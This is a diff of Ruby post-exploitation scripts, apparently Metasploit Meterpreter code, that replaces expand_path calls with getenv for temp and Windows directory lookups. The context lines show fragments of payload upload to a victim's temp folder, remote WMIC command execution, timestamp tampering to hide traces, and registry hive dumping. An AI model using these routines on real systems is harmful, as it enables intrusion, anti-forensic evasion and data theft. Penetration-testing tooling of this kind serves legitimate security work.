@ -32,7 +32,7 @@ def upload(session,file,trgloc)
|
|||
if not ::File.exists?(file)
|
||||
raise "File to Upload does not exists!"
|
||||
else
|
||||
@location = session.fs.file.expand_path("%TEMP%")
|
||||
@location = session.sys.config.getenv('TEMP')
|
||||
begin
|
||||
ext = file.scan(/\S*(.exe)/i)
|
||||
if ext.join == ".exe"
|
||||
|
|
|
@ -152,7 +152,7 @@ else
|
|||
#
|
||||
# Upload to the filesystem
|
||||
#
|
||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
||||
tempdir = client.sys.config.getenv('TEMP')
|
||||
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||
tempexe.gsub!("\\\\", "\\")
|
||||
|
||||
|
|
|
@ -87,7 +87,7 @@ def upload(client,file,trgloc = nil)
|
|||
raise "File to Upload does not exists!"
|
||||
else
|
||||
if trgloc == nil
|
||||
location = client.fs.file.expand_path("%TEMP%")
|
||||
location = client.sys.config.getenv('TEMP')
|
||||
else
|
||||
location = trgloc
|
||||
end
|
||||
|
|
|
@ -264,7 +264,7 @@ def wmicexec(wmiccmds= nil)
|
|||
@client.response_timeout=120
|
||||
|
||||
begin
|
||||
tmp = @client.fs.file.expand_path("%TEMP%")
|
||||
tmp = @client.sys.config.getenv('TEMP')
|
||||
|
||||
wmiccmds.each do |wmi|
|
||||
if i < 10
|
||||
|
@ -409,7 +409,7 @@ end
|
|||
def chmace(cmds)
|
||||
windir = ''
|
||||
print_status("Changing Access Time, Modified Time and Created Time of Files Used")
|
||||
windir = @client.fs.file.expand_path("%WinDir%")
|
||||
windir = @client.sys.config.getenv('WinDir')
|
||||
cmds.each do |c|
|
||||
begin
|
||||
@client.core.use("priv")
|
||||
|
@ -430,7 +430,7 @@ def regdump(pathoflogs,filename)
|
|||
#This variable will only contain garbage, it is to make sure that the channel is not closed while the reg is being dumped and compress
|
||||
garbage = ''
|
||||
hives = %w{HKCU HKLM HKCC HKCR HKU}
|
||||
windir = @client.fs.file.expand_path("%WinDir%")
|
||||
windir = @client.sys.config.getenv('WinDir')
|
||||
print_status('Dumping and Downloading the Registry')
|
||||
hives.each do |hive|
|
||||
begin
|
||||
|
|
|
@ -22,7 +22,7 @@ def wmicexec(session,wmiccmds= nil)
|
|||
tmpout = ''
|
||||
session.response_timeout=120
|
||||
begin
|
||||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
tmp = session.sys.config.getenv('TEMP')
|
||||
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
|
||||
wmiccmds.each do |wmi|
|
||||
print_status "running command wmic #{wmi}"
|
||||
|
|